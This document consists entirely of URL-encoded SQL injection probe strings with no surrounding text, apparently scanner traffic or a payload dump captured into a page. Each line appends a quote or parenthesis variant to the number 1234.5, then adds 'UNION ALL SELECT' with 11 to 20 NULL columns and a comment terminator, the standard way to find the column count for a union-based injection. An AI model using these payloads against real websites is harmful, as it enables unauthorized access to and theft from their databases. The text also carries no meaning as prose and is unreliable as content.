1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 